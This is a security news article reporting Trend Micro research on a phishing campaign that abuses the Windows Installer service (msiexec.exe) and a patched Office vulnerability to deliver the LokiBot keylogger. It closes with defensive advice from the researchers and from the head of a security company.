Windows Installer service hacked to infect victims' systems with malware
Windows Installer service hacked to infect victims' systems with malware
Cyber-criminals are using a malware spam campaign to exploit a remote code execution vulnerability in Microsoft Office to download and execute malicious scripts on victims' systems.

New research by Trend Micro revealed how hackers are exploiting a vulnerability in Microsoft Office, which was previously patched in September last year, to infect victims' systems with malware.

The reason why the said vulnerability is being exploited again is that hackers are now using the Windows Installer service in Microsoft Windows operating systems to infect systems instead of exploiting the vulnerability using the Windows executable mshta.exe to run a Powershell script.

Even though mshta.exe is still being used by hackers, it is now used as part of the Windows Installer service, thereby bypassing the patch previously issued by Microsoft. The campaign basically involves hackers sending phishing emails to unsuspecting victims, asking them to "confirm a payment they made to the sender" and to download an infected word document to check if their PCs are infected with virus or malicious codes. The said documents are labelled “Payment copy.Doc” to make recipients believe they are authentic.

"Once downloaded, Windows Installer (msiexec.exe) will proceed to install an MSIL or Delphi binary to the system. Depending on the MSI package downloaded, it may contain either a heavily obfuscated Microsoft Intermediate Language (MSIL) or Delphi binary file, which then acts as a loader for the actual payload.

"One notable aspect of the package is that it provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. While this is relatively simple, being able to detect and identify the actual payload might be more difficult since it is contained in the heavily obfuscated MSIL or Delphi binary," the researchers noted.

They added that since the use of msiexec.exe to download a malicious MSI package is not a common technique to infect systems with malware, existing anti-malware solutions are not designed to detect this technique, even though such solutions can monitor and isolate individual downloader processes like Wscript, Powershell, Mshta.exe, and Winword.exe.

The malware being installed and executed on victims' systems using this new technique is LokiBot, which according to the researchers is a "a keylogger that was primarily advertised as capable of stealing passwords and cryptocurrency wallets."

"We believe it [using the Windows Installer service in Microsoft Windows operating systems to inject malware] might represent a new evasion mechanism for malware creators to skirt around security software that usually focuses on traditional installation methods," they added.

By learning to identify phishing emails and not downloading attachments in emails from unknown sources, users will be able to prevent their systems from being compromised by malware. According to Trend Micro, since communication that involve business transactions are also often highly professional, employees should also look for grammatical errors and misspellings to catch possible phishing attempts.

“Phishing continues to be a menace that organisations are struggling to deflect. The issue is that most technologies focus on the gateway, utilising content filtering and signatures, which would not spot the compressed messages attackers are using in this instance," says Eyal Benishti, CEO and Founder of Ironscales.

"Focus must move down the stack to the recipients inbox, that harnesses both human detection and machine intelligence, to automate and respond at scale to these types of attacks. By examining user communications and meta data to establish a baseline, anomalies in communications are easily spotted and automatically flagged as suspicious, to help people make smarter and quick decisions regarding emails within the mailbox," he adds.